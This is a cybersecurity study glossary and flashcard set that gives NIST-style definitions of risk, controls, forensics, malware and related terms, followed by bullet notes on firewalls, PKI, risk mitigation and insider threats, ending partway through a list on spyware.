Assessment results produced by the application of an assessment procedure to a security control or control enhancement to achieve an assessment objective; the execution of a determination statement within an assessment procedure by an assessor that results in either a satisfied or other than satisfied condition.
Hardening
Configuring a host's operating systems and applications to reduce the host's security weaknesses.
Anti-spoof
Countermeasures taken to prevent the unauthorized use of legitimate Identification & Authentication (I&A) data, however it was obtained, to mimic a subject different from the attacker.
Recovery Oriented Computing
Designing systems that recover quickly, with capabilities to help operators pinpoint and correct faults in multi-component systems.
Compromise
Disclosure of information to unauthorized persons, or a violation of the security policy of a system in which unauthorized intentional or unintentional disclosure, modification, destruction, or loss of an object may have occurred.
Implant
Electronic device or electronic equipment modification designed to gain unauthorized interception of information-bearing emanations.
Digital Evidence
Electronic information stored or transferred in digital form.
Authentication
Encompasses identity verification, message origin authentication, and message content authentication.
Availability
Ensuring timely and reliable access to and use of information. The property of being accessible and useable upon demand by an authorized entity.
Flaw
Error of commission, omission, or oversight in an information system that may allow protection mechanisms to be bypassed.
IT Security Awareness and Training Program
Explains proper rules of behavior for the use of agency IT systems, information systems, and information. The program communicates IT security policies and procedures that need to be followed (i.e., NSTISSD 501, NIST SP 800-50).
Level of Protection
Extent to which protective measures, techniques, and procedures must be applied to information systems and networks based on risk, threat, vulnerability, system interconnectivity considerations, and information assurance needs. Levels of protection are: 1. Basic: information systems and networks requiring implementation of standard minimum security countermeasures. 2. Medium: information systems and networks requiring layering of additional safeguards above the standard minimum security countermeasures. 3. High: information systems and networks requiring the most stringent protection and rigorous security countermeasures.
Threat Assessment
Formal description and evaluation of threat to an information system (SOURCE: SP 800-53; SP 800-18). Process of formally evaluating the degree of threat to an information system or enterprise and describing the nature of the threat.
Security Plan
Formal document that provides an overview of the security requirements for an information system or an information security program and describes the security controls in place or planned for meeting those requirements. See 'System Security Plan' or 'Information Security Program Plan.'
Information Security Program Plan
Formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management controls and common controls in place or planned for meeting those requirements.
Security Program Plan
Formal document that provides an overview of the security requirements for an organization-wide information security program and describes the program management security controls and common security controls in place or planned for meeting those requirements.
Disk Imaging
Generating a bit-for-bit copy of the original media, including free space and slack space.
Assurance
Grounds for confidence that the other four security goals (integrity, availability, confidentiality, and accountability) have been adequately met by a specific implementation. "Adequately met" includes (1) functionality that performs correctly, (2) sufficient protection against unintentional errors (by users or software), and (3) sufficient resistance to intentional penetration or by-pass. The grounds for confidence that the set of intended security controls in an information system are effective in their application. Measure of confidence that the security features, practices, procedures, and architecture of an information system accurately mediates and enforces the security policy.
Computer Incident Response Team (CIRT)
Group of individuals usually consisting of Security Analysts organized to develop, recommend, and coordinate immediate mitigation actions for containment, eradication, and recovery resulting from computer security incidents. Also called a Computer Security Incident Response Team (CSIRT) or a CIRC (Computer Incident Response Center, Computer Incident Response Capability, or Cyber Incident Response Team).
Integrity
1. Guarding against improper information modification or destruction, and includes ensuring information non-repudiation and authenticity. 2. The property that sensitive data has not been modified or deleted in an unauthorized and undetected manner.
Intrusion Detection Systems (IDS)
Hardware or software product that gathers and analyzes information from various areas within a computer or a network to identify possible security breaches, which include both intrusions (attacks from outside the organization) and misuse (attacks from within the organization).
Internal Security Controls
Hardware, firmware, or software features within an information system that restrict access to resources only to authorized subjects.
Malicious Logic
Hardware, firmware, or software that is intentionally included or inserted in a system for a harmful purpose.
Baseline
Hardware, software, databases, and relevant documentation for an information system at a given point in time.
Easter Egg
Hidden functionality within an application program, which becomes activated when an undocumented, and often convoluted, set of commands and keystrokes is entered. Easter eggs are typically used to display the credits for the development team and are intended to be nonthreatening.
ISACA (Information Systems Audit and Control Association)
ISACA now goes by its acronym only, to reflect the broad range of IT governance professionals it serves.
IT Security Education
IT Security Education seeks to integrate all of the security skills and competencies of the various functional specialties into a common body of knowledge, adds a multidisciplinary study of concepts, issues, and principles (technological and social), and strives to produce IT security specialists and professionals capable of vision and proactive response.
IT Security Training
IT Security Training strives to produce relevant and needed security skills and competencies by practitioners of functional specialties other than IT security (e.g., management, systems design and development, acquisition, auditing). The most significant difference between training and awareness is that training seeks to teach skills, which allow a person to perform a specific function, while awareness seeks to focus an individual's attention on an issue or set of issues. The skills acquired during training are built upon the awareness foundation, in particular, upon the security basics and literacy material.
IS Policies *MOST IMPORTANT ONE*
IT equipment issued by the company is corporate property. Anything you use the equipment for can be monitored and reviewed.
Risk Management
Identify, control, and minimize the impact of threats
Likelihood of Occurrence
In Information Assurance risk analysis, a weighted factor based on a subjective analysis of the probability that a given threat is capable of exploiting a given vulnerability.
Cyber Infrastructure
Includes electronic information and communications systems and services and the information contained in these systems and services. Information and communications systems and services are composed of all hardware and software that process, store, and communicate information, or any combination of all of these elements. Processing includes the creation, access, modification, and destruction of information. Storage includes paper, magnetic, electronic, and all other media types. Communications include sharing and distribution of information. For example: computer systems; control systems (e.g., supervisory control and data acquisition-SCADA); networks, such as the Internet; and cyber services (e.g., managed security services) are part of cyber infrastructure.
Audit
Independent review and examination of records and activities to assess the adequacy of system controls, to ensure compliance with established policies and operational procedures, and to recommend necessary changes in controls, policies, or procedures.
Privileged Accounts
Individuals who have access to set "access rights" for users on a given system. Sometimes referred to as system or network administrative accounts.
Defense-in-Depth
Information security strategy integrating people, technology, and operations capabilities to establish variable barriers across multiple layers and dimensions of the organization.
Control Information
Information that is entered into a cryptographic module for the purposes of directing the operation of the module.
Personally Identifiable Information (PII)
Information which can be used to distinguish or trace an individual's identity, such as their name, social security number, biometric records, etc., alone, or when combined with other personal or identifying information which is linked or linkable to a specific individual, such as date and place of birth, mother's maiden name, etc.
Non-Repudiation
The security service by which the entities involved in a communication cannot deny having participated. Specifically, the sending entity cannot deny having sent a message (non-repudiation with proof of origin), and the receiving entity cannot deny having received a message (non-repudiation with proof of delivery). A service that is used to provide assurance of the integrity and origin of data in such a way that the integrity and origin can be verified and validated by a third party as having originated from a specific entity in possession of the private key (i.e., the signatory).
Risk Monitoring
Maintaining ongoing awareness of an organization's risk environment, risk management program, and associated activities to support risk decisions.
File Security
Means by which access to computer files is limited to authorized users only.
IT Security Metrics
Metrics based on IT security performance goals and objectives.
Boundary Protection
Monitoring and control of communications at the external boundary of an information system to prevent and detect malicious and other unauthorized communication, through the use of boundary protection devices (e.g., proxies, gateways, routers, firewalls, guards, encrypted tunnels).
Assessment Method
One of three types of actions (i.e., examine, interview, test) taken by assessors in obtaining evidence during an assessment.
Continuous Monitoring
Ongoing monitoring sufficient to ensure and assure effectiveness of security controls related to systems, networks, and cyberspace, by assessing security control implementation and organizational security status in accordance with organizational risk tolerance
Boundary
Physical or logical perimeter of a system.
Removable Media
Portable electronic storage media such as magnetic, optical, and solid-state devices, which can be inserted into and removed from a computing device, and that is used to store text, video, audio, and image information. Such devices have no independent processing capabilities. Examples include hard disks, floppy disks, zip drives, compact disks (CDs), thumb drives, pen drives, and similar USB storage devices.
Confidentiality
Preserving authorized restrictions on information access and disclosure, including means for protecting personal privacy and proprietary information.
Risk Mitigation
Prioritizing, evaluating, and implementing the appropriate risk reducing controls/countermeasures recommended from the risk management process.
Configuration Control
Process of controlling modifications to hardware, firmware, software, and documentation to protect the information system against improper modification prior to, during, and after system implementation.
Security Testing
Process to determine that an information system protects data and maintains functionality as intended.
Data Security
Protection of data from unauthorized (accidental or intentional) modification, destruction, or disclosure.
Safeguards
Protective measures prescribed to meet the security requirements (i.e., confidentiality, integrity, and availability) specified for an information system. Safeguards may include security features, management constraints, personnel security, and security of physical structures, areas, and devices. Synonymous with security controls and countermeasures.
Indicator of Compromise (IOC)
Recognized action, specific, generalized, or theoretical, that an adversary might be expected to take in preparation for an attack. A sign that an incident may have occurred or may be currently occurring.
Criticality Level
Refers to the (consequences of) incorrect behavior of a system. The more serious the expected direct and indirect effects of incorrect behavior, the higher the criticality level.
Privacy
Restricting access to subscriber or Relying Party information in accordance with federal law and agency policy.
External Auditors
Review internal audit results and perform independent information systems audit
Walkthrough
Review of specification or design document by small group of qualified people
Viruses
Rogue software program that attaches itself to other software programs or data files in order to be executed
Access List
Roster of individuals authorized admittance to a controlled area. SOURCE: CNSSI-4009
Internal Security Testing
Security testing conducted from inside the organization's security perimeter.
External Security Testing
Security testing conducted from outside the organization's security perimeter.
Overt Testing
Security testing performed with the knowledge and consent of the organization's IT staff.
Passive Security Testing
Security testing that does not involve any direct interaction with the targets, such as sending packets to a target.
Black Box Testing
See Basic Testing.
Vulnerability Analysis
See Vulnerability Assessment.
Vulnerability Assessment
Formal description and evaluation of the vulnerabilities in an information system. Systematic examination of an information system or product to determine the adequacy of security measures, identify security deficiencies, provide data from which to predict the effectiveness of proposed security measures, and confirm the adequacy of such measures after implementation.
Malicious Applets
Small application programs that are automatically downloaded and executed and that perform an unauthorized function on an information system.
Malicious Code
Software or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.
Internet Protocol (IP)
Standard protocol for transmission of data from source to destinations in packet-switched communications networks and interconnected systems of such networks.
Quarantine
Store files containing malware in isolation for future disinfection or examination.
IP Security (IPsec)
Suite of protocols for securing Internet Protocol (IP) communications at the network layer (layer 3 of the OSI model) by authenticating and/or encrypting each IP packet in a data stream. IPsec also includes protocols for cryptographic key establishment.
Critical Infrastructure
System and assets, whether physical or virtual, so vital to the U.S. that the incapacity or destruction of such systems and assets would have a debilitating impact on security, national economic security, national public health or safety, or any combination of those matters. [Critical Infrastructures Protection Act of 2001, 42 U.S.C. 5195c(e)]
Covert Testing
Testing performed using covert methods and without the knowledge of the organization's IT staff, but with the full knowledge and permission of upper management.
IT Security Policy
The "documentation of IT security decisions" in an organization. NIST SP 800-12 categorizes IT Security Policy into three basic types: 1) Program Policy—high-level policy used to create an organization's IT security program, define its scope within the organization, assign implementation responsibilities, establish strategic direction, and assign resources for implementation. 2) Issue-Specific Policies—address specific issues of concern to the organization, such as contingency planning, the use of a particular methodology for systems risk management, and implementation of new regulations or law. These policies are likely to require more frequent revision as changes in technology and related factors take place. 3) System-Specific Policies—address individual systems, such as establishing an access control list or in training users as to what system actions are permitted. These policies may vary from system to system within the same organization. In addition, policy may refer to entirely different matters, such as the specific managerial decisions setting an organization's electronic mail (email) policy or fax security policy.
Internet
The Internet is the single, interconnected, worldwide system of commercial, governmental, educational, and other computer networks that share (a) the protocol suite specified by the Internet Architecture Board (IAB), and (b) the name and address spaces managed by the Internet Corporation for Assigned Names and Numbers (ICANN).
Information System Resilience
The ability of an information system to continue to operate while under attack, even if in a degraded or debilitated state, and to rapidly recover operational capabilities for essential functions after a successful attack. The ability of an information system to continue to: (i) operate under adverse conditions or stress, even if in a degraded or debilitated state, while maintaining essential operational capabilities; and (ii) recover to an effective operational posture in a time frame consistent with mission needs.
Password Protected
The ability to protect a file using a password access control, protecting the data contents from being viewed with the appropriate viewer unless the proper password is entered.
Cybersecurity
The ability to protect or defend the use of cyberspace from cyber attacks.
Resilience
The ability to quickly adapt and recover from any known or unknown changes to the environment through holistic implementation of risk management, contingency, and continuity planning. The ability to continue to: (i) operate under adverse conditions or stress, even if in a degraded or debilitated state, while maintaining essential operational capabilities; and (ii) recover to an effective operational posture in a time frame consistent with mission needs.
Remediation
The act of correcting a vulnerability or eliminating a threat. Three possible types of remediation are installing a patch, adjusting configuration settings, or uninstalling a software application.
Maximum Tolerable Downtime
The amount of time mission/business processes can be disrupted without causing significant harm to the organization's mission.
Digital Forensics
The application of science to the identification, collection, examination, and analysis of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
Steganography
The art and science of communicating in a way that hides the existence of the communication. For example, a child pornography image can be hidden inside another graphic image file, audio file, or other file format.
Failover
The capability to switch over automatically (typically without human intervention or warning) to a redundant or standby information system upon the failure or abnormal termination of the previously active system.
Cryptography
The discipline that embodies principles, means, and methods for providing information security, including confidentiality, data integrity, non-repudiation, and authenticity. Is categorized as either secret key or public key. Secret key cryptography is based on the use of a single cryptographic key shared between two parties. The same key is used to encrypt and decrypt data. This key is kept secret by the two parties. Public key cryptography is a form of cryptography which makes use of two keys: a public key and a private key. The two keys are related but have the property that, given the public key, it is computationally infeasible to derive the private key [FIPS 140-1]. In a public key cryptosystem, each party has its own public/private key pair. The public key can be known by anyone; the private key is kept secret. Art or science concerning the principles, means, and methods for rendering plain information unintelligible and for restoring encrypted information to intelligible form.
Business Continuity Plan (BCP)
The documentation of a predetermined set of instructions or procedures that describe how an organization's mission/business functions will be sustained during and after a significant disruption. The documentation of a predetermined set of instructions or procedures that describe how an organization's business functions will be sustained during and after a significant disruption.
Incident Response Plan
The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of malicious cyber attacks against an organization's information system(s). The documentation of a predetermined set of instructions or procedures to detect, respond to, and limit consequences of an incident against an organization's IT system(s).
Data Loss
The exposure of proprietary, sensitive, or classified information through either data theft or data leakage.
Security Control Assessor
The individual, group, or organization responsible for conducting a security control assessment.
Threat Source
The intent and method targeted at the intentional exploitation of a vulnerability or a situation and method that may accidentally trigger a vulnerability. Synonymous with Threat Agent.
Risk
The level of impact on organizational operations (including mission, functions, image, or reputation), organizational assets, or individuals resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring. The level of impact on organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, or the Nation resulting from the operation of an information system given the potential impact of a threat and the likelihood of that threat occurring. A measure of the extent to which an entity is threatened by a potential circumstance or event, and typically a function of: (i) the adverse impacts that would arise if the circumstance or event occurs; and (ii) the likelihood of occurrence. Note: Information system-related security risks are those risks that arise from the loss of confidentiality, integrity, or availability of information or information systems and consider the adverse impacts to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations.
Risk Tolerance
The level of risk an entity is willing to assume in order to achieve a potential desired result. The defined impacts to an enterprise's information systems that an entity is willing to accept. SOURCE: CNSSI-4009
Rogue Device
An unauthorized node on a network.
Potential Impact
The loss of confidentiality, integrity, or availability could be expected to have: 1) a limited adverse effect (FIPS 199 low); 2) a serious adverse effect (FIPS 199 moderate); or 3) a severe or catastrophic adverse effect (FIPS 199 high) on organizational operations, organizational assets, or individuals. The loss of confidentiality, integrity, or availability could be expected to have a limited adverse effect; a serious adverse effect, or a severe or catastrophic adverse effect on organizational operations, organizational assets, or individuals. The loss of confidentiality, integrity, or availability that could be expected to have a limited (low) adverse effect, a serious (moderate) adverse effect, or a severe or catastrophic (high) adverse effect on organizational operations, organizational assets, or individuals.
Low Impact
The loss of confidentiality, integrity, or availability that could be expected to have a limited adverse effect on organizational operations, organizational assets, individuals, other organizations; 2) results in minor damage to organizational assets; 3) results in minor financial loss; or 4) results in minor harm to individuals.
Moderate Impact
The loss of confidentiality, integrity, or availability that could be expected to have a serious adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a significant degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in significant damage to organizational assets; 3) results in significant financial loss; or 4) results in significant harm to individuals that does not involve loss of life or serious life threatening injuries).
High Impact
The loss of confidentiality, integrity, or availability that could be expected to have a severe or catastrophic adverse effect on organizational operations, organizational assets, individuals, other organizations, or the national security interests of the United States; (i.e., 1) causes a severe degradation in mission capability to an extent and duration that the organization is able to perform its primary functions, but the effectiveness of the functions is significantly reduced; 2) results in major damage to organizational assets; 3) results in major financial loss; or 4) results in severe or catastrophic harm to individuals involving loss of life or serious life threatening injuries).
Impact
The magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability.
Impact Level
The magnitude of harm that can be expected to result from the consequences of unauthorized disclosure of information, unauthorized modification of information, unauthorized destruction of information, or loss of information or information system availability. High, Moderate, or Low security categories of an information system established in FIPS 199 which classify the intensity of a potential impact that may occur if the information system is jeopardized.
Compensating Security Controls
The management, operational, and technical controls (i.e., safeguards or countermeasures) employed by an organization in lieu of the recommended controls in the low, moderate, or high baselines described in NIST Special Publication 800-53, that provide equivalent or comparable protection for an information system (SOURCE: SP 800-37). The management, operational, and technical controls (i.e., safeguards or countermeasures) employed by an organization in lieu of the recommended controls in the baselines described in NIST Special Publication 800-53 and CNSS Instruction 1253, that provide equivalent or comparable protection for an information system.
Security Controls
The management, operational, and technical controls (i.e., safeguards or countermeasures) prescribed for an information system to protect the confidentiality, integrity, and availability of the system and its information.
Security Control Effectiveness
The measure of correctness of implementation (i.e., how consistently the control implementation complies with the security plan) and how well the security plan meets organizational needs in accordance with current risk tolerance.
Enterprise Risk Management
The methods and processes used by an enterprise to manage risks to its mission and to establish the trust necessary for the enterprise to support shared missions. It involves the identification of mission dependencies on enterprise capabilities, the identification and prioritization of risks due to defined threats, the implementation of countermeasures to provide both a static risk posture and an effective dynamic response to active threats; and it assesses enterprise performance against threats and adjusts countermeasures as necessary.
Baseline Security
The minimum security controls required for safeguarding an IT system based on its identified needs for confidentiality, integrity, and/or availability protection.
IT-Related Risk
The net mission/business impact considering 1) the likelihood that a particular threat source will exploit, or trigger, a particular information system vulnerability, and 2) the resulting impact if this should occur. IT-related risks arise from legal liability or mission/business loss due to, but not limited to: Unauthorized (malicious, non-malicious, or accidental) disclosure, modification, or destruction of information; Non-malicious errors and omissions; IT disruptions due to natural or man-made disasters; or Failure to exercise due care and diligence in the implementation and operation of the IT.
Recovery Time Objective
The overall length of time an information system's components can be in the recovery phase before negatively impacting the organization's mission or mission/business functions.
Computer Forensics
The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data.
Forensics
The practice of gathering, retaining, and analyzing computer-related data for investigative purposes in a manner that maintains the integrity of the data. See also Computer Forensics.
Denial of Service (DoS)
The prevention of authorized access to resources or the delaying of time-critical operations. (Time-critical may be milliseconds or it may be hours, depending upon the service provided.)
Least Trust
The principle that a security architecture should be designed in a way that minimizes 1) the number of components that require trust, and 2) the extent to which each component is trusted.
Risk
The probability that a threat will impact an information resource
Continuous Monitoring
The process implemented to maintain a current security status for one or more information systems or for the entire suite of information systems on which the operational mission of the enterprise depends. The process includes: 1) The development of a strategy to regularly evaluate selected IA controls/metrics, 2) Recording and evaluating IA relevant events and the effectiveness of the enterprise in dealing with those events, 3) Recording changes to IA controls, or changes that affect IA risks, and 4) Publishing the current security status to enable information-sharing decisions involving the enterprise.
Anomaly-Based Detection
The process of comparing definitions of what activity is considered normal against observed events to identify significant deviations.
Full Disk Encryption (FDE)
The process of encrypting all the data on the hard disk drive used to boot a computer, including the computer's operating system, and permitting access to the data only after successful authentication with the full disk encryption product.
File Encryption
The process of encrypting individual files on a storage medium and permitting access to the encrypted data only after proper authentication is provided.
Risk Assessment
The process of identifying risks to organizational operations (including mission, functions, image, or reputation), organizational assets, individuals, other organizations, and the Nation, arising through the operation of an information system. Part of risk management, incorporates threat and vulnerability analyses and considers mitigations provided by security controls planned or in place. Synonymous with risk analysis. The process of identifying, prioritizing, and estimating risks. This includes determining the extent to which adverse circumstances or events could impact an enterprise. Uses the results of threat and vulnerability assessments to identify risk to organizational operations and evaluates those risks in terms of likelihood of occurrence and impacts if they occur. The product of a risk assessment is a list of estimated potential impacts and unmitigated vulnerabilities. Risk assessment is part of risk management and is conducted throughout the Risk Management Framework (RMF).
Risk Analysis
The process of identifying the risks to system security and determining the likelihood of occurrence, the resulting impact, and the additional safeguards that mitigate this impact. Part of risk management and synonymous with risk assessment. Examination of information to identify the risk to an information system. See Risk Assessment.
Risk Management
The process of managing risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system, and includes: (i) the conduct of a risk assessment; (ii) the implementation of a risk mitigation strategy; and (iii) employment of techniques and procedures for the continuous monitoring of the security state of the information system.
Content Filtering
The process of monitoring communications such as email and Web pages, analyzing them for suspicious content, and preventing the delivery of suspicious content to users.
Password Cracking
The process of recovering secret passwords stored in a computer system or transmitted over a network.
Blacklisting
The process of the system invalidating a user ID based on the user's inappropriate actions. A blacklisted user ID cannot be used to log on to the system, even with the correct authenticator. Blacklisting and lifting of a blacklisting are both security-relevant events. Blacklisting also applies to blocks placed against IP addresses to prevent inappropriate or unauthorized use of Internet resources.
Keystroke Monitoring
The process used to view or record both the keystrokes entered by a computer user and the computer's response during an interactive session. Keystroke monitoring is usually considered a special case of audit trails.
Firmware
The programs and data components of a cryptographic module that are stored in hardware within the cryptographic boundary and cannot be dynamically written or modified during execution. Computer programs and data stored in hardware - typically in read-only memory (ROM) or programmable read-only memory (PROM) - such that the programs and data cannot be dynamically written or modified during execution of the programs.
Data Integrity
The property that data has not been altered in an unauthorized manner. Data integrity covers data in storage, during processing, and while in transit. The property that data has not been changed, destroyed, or lost in an unauthorized or accidental manner.
Information Security
The protection of information and information systems from unauthorized access, use, disclosure, disruption, modification, or destruction in order to provide confidentiality, integrity, and availability.
Information Security Risk
The risk to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation due to the potential for unauthorized access, use, disclosure, disruption, modification, or destruction of information and/or information systems.
Technical Controls
The security controls (i.e., safeguards or countermeasures) for an information system that are primarily implemented and executed by the information system through mechanisms contained in the hardware, software, or firmware components of the system.
Operational Controls
The security controls (i.e., safeguards or countermeasures) for an information system that primarily are implemented and executed by people (as opposed to systems).
Least Privilege
The security objective of granting users only those accesses they need to perform their official duties. The principle that a security architecture should be designed so that each entity is granted the minimum system resources and authorizations that the entity needs to perform its function.
Security Controls Baseline
The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.
Security Control Baseline
The set of minimum security controls defined for a low-impact, moderate-impact, or high-impact information system.
Patch Management
The systematic notification, identification, deployment, installation, and verification of operating system and application software code revisions. These revisions are known as patches, hot fixes, and service packs.
Authenticate
To confirm the identity of an entity when that identity is presented. To verify the identity of a user, user device, or other entity.
Phishing
Tricking individuals into disclosing sensitive personal information through deceptive computer-based means. Deceiving individuals into disclosing sensitive personal information through deceptive computer-based means. A digital form of social engineering that uses authentic-looking—but bogus—emails to request information from users or direct them to a fake Web site that requests information.
Back Door
Typically unauthorized hidden software or hardware mechanism used to circumvent security controls. An undocumented way of gaining access to a computer system. A backdoor is a potential security risk.
Intrusion
Unauthorized act of bypassing the security mechanisms of a system.
Automated Security Monitoring
Use of automated procedures to ensure security controls are not circumvented or the use of these tools to track actions taken by subjects suspected of misusing the information system.
Distributed Denial of Service attacks (DDoS)
Use of numerous computers to launch a DoS so that the defender cannot stop the attack by only blocking the one IP address where the attack arose.
Intellectual Property
Useful artistic, technical, and/or industrial information, knowledge or ideas that convey ownership and control of tangible or virtual usage and/or representation.
Port Scanning
Using a program to remotely determine which ports on a system are open (e.g., whether systems allow connections through those ports).
Vulnerability
Weakness in an information system, system security procedures, internal controls, or implementation that could be exploited or triggered by a threat source. A weakness in a system, application, or network that is subject to exploitation or misuse. Weakness in an information system, system security procedures, internal controls, or implementation that could be exploited by a threat source.
Masquerading
When an unauthorized agent claims the identity of another agent, it is said to be masquerading. A type of threat action whereby an unauthorized entity gains access to a system or performs a malicious act by illegitimately posing as an authorized entity.
Situational Awareness
Within a volume of time and space, the perception of an enterprise's security posture and its threat environment; the comprehension/meaning of both taken together (risk); and the projection of their status into the near future.
Malware (forms of)
- Viruses
- Worms
- Trojan horses (software that appears benign but does something other than expected)
- SQL injection attacks (hackers submit data to Web forms that exploit the site's unprotected software and send a rogue SQL query to the database)
what are the NIST components of the cybersecurity lifecycle
identify, monitor, protect, detect, respond, recover
what are the three main methods or controls that shape cybersecurity?
people, process, technology
What is cybersecurity
preventing the unauthorized access to data and information systems
Computer Crime
- *Defined as "any violations of criminal law that involve a knowledge of computer technology for their perpetration, investigation, or prosecution"*
  > The National Information Infrastructure Protection Act of 1996 makes virus distribution and hacker attacks to disable Web sites federal crimes (up to 20 years in jail).
- *Computer may be the target of crime, for example:*
  > Breaching confidentiality of protected computerized data
  > Accessing a computer system without authority
- *Computer may be the instrument of crime, for example:*
  > Using e-mail for threats or harassment
  > Theft of intellectual property
- Trade secret = company secret, not public information
- Patent = protects an invention or process for 20 years
- Copyright = protects ownership of the property for the life of the creator plus 70 years
Why systems are vulnerable
- Accessibility of networks via unauthenticated sources (e.g., open to the Internet)
- Hardware problems (breakdowns, configuration errors, damage from improper use or crime, failure to maintain patches to the hardware such as a firmware update)
- Software problems (programming or installation errors, unauthorized changes, failure to maintain patches to the software)
- Use of networks/computers outside of the firm's control
- Loss and theft of endpoints with authenticated access to the systems, such as portable devices
Cyberterrorism and Cyberwarfare
- Attack via the Internet using a target's computer systems to cause physical, real-world harm
- Usually employed to carry out a political agenda
- Supervisory Control and Data Acquisition (SCADA) or Industrial Control Systems (ICS) attacks: attacks on the systems that run real-world operations such as manufacturing plants and the power grid
- SCADA systems control chemical, physical, or transport processes (i.e., oil refineries, water and sewage treatment plants, electrical generators, and nuclear power plants)
- 1982 Soviet gas pipeline / Farewell Dossier
Identity Management
- Business processes and tools to identify valid users of a system and control access
  > Identifies and authorizes different categories of users
  > Specifies which portion of the system users can access
  > Authenticates users and protects identities
- Identity management systems
  > Capture access rules for different levels of users
Antivirus and Antispyware software
- Checks computers for presence of malware and can often eliminate it as well - Requires continual updating
Firewall
- Combination of hardware and software that prevents unauthorized users from accessing private networks
- Technologies include:
  > Static packet filtering
  > Stateful inspection
  > Network address translation (NAT)
  > Application proxy filtering
Software Vulnerability
- Commercial software contains flaws that create security vulnerabilities
  > Hidden bugs (program code defects)
    * Zero defects cannot be achieved because complete testing is not possible with large programs
  > Flaws can open networks to intruders
- Patches
  > Small pieces of software to repair flaws
  > Exploits are often created faster than patches can be released and implemented
Digital Certificate
- Data file used to establish the identity of users and electronic assets for protection of online transactions
- Uses a trusted third party, a certification authority (CA), to validate a user's identity
- The CA verifies the user's identity and stores the information on the CA server, which generates an encrypted digital certificate containing the owner's ID information and a copy of the owner's public key
Worms and Viruses spread (propagated) by
- Downloads - E-mail, IM attachments - Downloads on web sites and social networks - Shared USB drives
Sniffer
- Eavesdropping program that monitors information traveling over network - Enables hackers to steal proprietary information such as e-mail, company files, and so on
Electronic Evidence
- Evidence for white-collar crimes is often in digital form
  > Data on computers, e-mail, instant messages, e-commerce transactions
- Proper control of data can save time and money when responding to a legal discovery request
IS Audit or Assessment
- Examines the firm's overall security environment as well as controls governing individual information systems
- Reviews technologies, procedures, documentation, training, and personnel
- May even simulate a disaster to test the response of technology, IS staff, and other employees
- Lists and ranks all control weaknesses and estimates the probability of their occurrence
- Assesses the financial and organizational impact of each threat
Public Key Infrastructure (PKI)
- Use of public key cryptography working with certificate authority - Widely used in e-commerce
Public Key Encryption
- Uses two, mathematically related keys: Public key and private key - Sender encrypts message with recipient's public key - Recipient decrypts with private key
Business Value of Security and Control
- Failed computer systems can lead to significant or total loss of business function.
- Firms are now more vulnerable than ever.
- Confidential personal and financial data
  > TARGET customer breach - estimated costs $61M (as of 2-26-14)
- Trade secrets, new products, strategies
- A security breach may cut into a firm's market value almost immediately.
- Inadequate security and controls also bring forth issues of liability.
Fault-Tolerant Computer Systems
- For continuous availability, for example, stock markets - Contain redundant hardware, software, and power supply components that create an environment that provides continuous, uninterrupted service
General Controls
- Govern design, security, and use of computer programs and security of data files in general throughout organization's information technology infrastructure - Apply to all computerized applications - Combination of hardware, software, and manual procedures to create overall control environment
High-Availability Computing
- Helps recover quickly from crash - Minimizes, does not eliminate, downtime
Espionage or Trespass
- Individual attempts to gain illegal access to organizational information - Competitive intelligence: Legal information gathering - Industrial espionage: Crosses the legal boundary
Information Systems and Ethics
- Information systems raise new ethical questions because they create opportunities for: > Intense social change, threatening existing distributions of power, money, rights, and obligations > New kinds of crime
Information Systems Controls
- Manual and automated controls - General and application controls
Spoofing
- Misrepresenting oneself by using fake e-mail addresses or masquerading as someone else - Redirecting Web link to address different from intended one, with site masquerading as intended destination
Intrusion Detection Systems
- Monitors hot spots on corporate networks to detect and deter intruders - Examines events as they are happening to discover attacks in progress
Internet Vulnerabilities
- Network open to anyone - Size of internet means abuses can have wide impact - Use of fixed internet addresses (IPs) with cable/DSL modems creates fixed targets for hackers - encrypted VOIP - E-mail, P2P, IM
Risk Mitigation
- Organization takes concrete actions against risk
- Implements controls and develops a recovery plan
- Three strategies:
  > *Risk acceptance:* Accept the potential risk, continue operating with no controls, and absorb any damages that occur
  > *Risk limitation:* Limit the risk by implementing controls that minimize the impact of the threat
  > *Risk transference:* Transfer the risk by using other means to compensate for the loss, such as purchasing insurance
Risk Analysis
- Prioritize assets (probability x value) - Compare cost of security breach vs. cost of control
Security Policy
- Ranks information risks, identifies acceptable security goals, and identifies mechanisms for achieving these goals
- Drives other policies
  > Acceptable use policy (AUP): Defines acceptable uses of the firm's information resources and computing equipment
  > Authorization policies: Determine differing levels of user access to information assets
Security in the Cloud
- Responsibility for security resides with the company owning the data
- Firms must ensure providers provide adequate protection:
  > Where data are stored
  > Meeting corporate requirements and legal privacy laws
  > Segregation of data from other clients
  > Audits and security certifications
- Service level agreements (SLAs)
Computer Forensics
- Scientific collection, examination, authentication, preservation, and analysis of data from computer storage media for use as evidence in court of law - Includes recovery of ambient and hidden data
Securing Mobile Platforms
- Security policies should include and cover any special requirements for mobile devices
  > Guidelines for use of platforms and applications
- Mobile device management tools
  > Authorization
  > Inventory records
  > Control updates
  > Lock down/erase lost devices
  > Encryption
- Software for segregating corporate data on devices
Internal Threats: Employees
- Security threats often originate inside an organization
- Inside knowledge
- Sloppy security procedures
  > User lack of knowledge
- Social engineering:
  > Tricking employees into revealing their passwords by pretending to be legitimate members of the company in need of information
*One in five employees would sell the passwords they use at work to access employer networks if they were asked (the US is the highest country)*
Spyware
- Small programs that install themselves surreptitiously on computers to monitor user Web surfing activity and serve up advertising
- Key loggers
  > Record every keystroke on a computer to steal serial numbers and passwords or to launch Internet attacks
- Other types:
